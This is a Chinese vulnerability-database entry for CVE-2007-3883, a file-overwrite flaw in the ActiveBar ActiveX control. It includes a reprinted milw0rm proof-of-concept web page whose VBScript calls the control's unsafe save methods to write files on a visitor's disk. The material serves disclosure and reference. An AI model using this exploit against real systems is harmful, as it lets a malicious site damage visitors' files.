ActiveBar ActiveX控件多个不安全方式漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113329 漏洞类型 设计错误
发布时间 2007-07-17 更新时间 2009-03-18
CVE编号 CVE-2007-3883 CNNVD-ID CNNVD-200707-354
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/4190
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-354
|漏洞详情
ActiveBar控件用于生成MicrosoftOffice和VisualStudio的工具条、菜单以及仿真的windows界面。ActiveBar控件实现上存在漏洞,远程攻击者可能利用此漏洞破坏系统上的任意文件。ActiveBar的ActiveBar3Library.ActiveBar3.3(actbar.ocx)控件中的Save()、SaveLayoutChanges()和SaveMenuUsageData()方式不安全地将指定参数写入到文件,如果用户受骗访问了恶意站点的话,就可能导致覆盖并破坏系统上的任意文件。
|漏洞EXP
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">---------------------------------------------------------------------------------------
 <b>Data Dynamics ActiveBar ActiveX Control (actbar3.ocx <= 3.1) Multiple Inscure Methods</b>
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 <b>This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>
---------------------------------------------------------------------------------------

<object classid='clsid:5407153D-022F-4CD2-8BFF-465569BC5DB8' id='test'></object>

<select style="width: 404px" name="Pucca">
  <option value = "Save">Save</option>
  <option value = "SaveLayoutChanges">SaveLayoutChanges</option>
  <option value = "SaveMenuUsageData">SaveMenuUsageData</option>
</select>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  on error resume next
   Dim MyMsg
   if Pucca.value = "Save" then
    test.Save "", "c:\carlo1.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveLayoutChanges" then
    test.SaveLayoutChanges "c:\carlo2.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   elseif Pucca.value = "SaveMenuUsageData" then
    test.SaveMenuUsageData "c:\carlo3.txt", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
   end if

 End Sub
</script>

</span></span>
</code></pre>

# milw0rm.com [2007-07-17]
|参考资料

来源:MILW0RM
名称:5395
链接:http://www.milw0rm.com/exploits/5395
来源:MILW0RM
名称:4190
链接:http://www.milw0rm.com/exploits/4190
来源:OSVDB
名称:37692
链接:http://osvdb.org/37692
来源:XF
名称:datadynamics-actbar3-file-overwrite(35471)
链接:http://xforce.iss.net/xforce/xfdb/35471
来源:BID
名称:24959
链接:http://www.securityfocus.com/bid/24959
来源:SECUNIA
名称:26098
链接:http://secunia.com/advisories/26098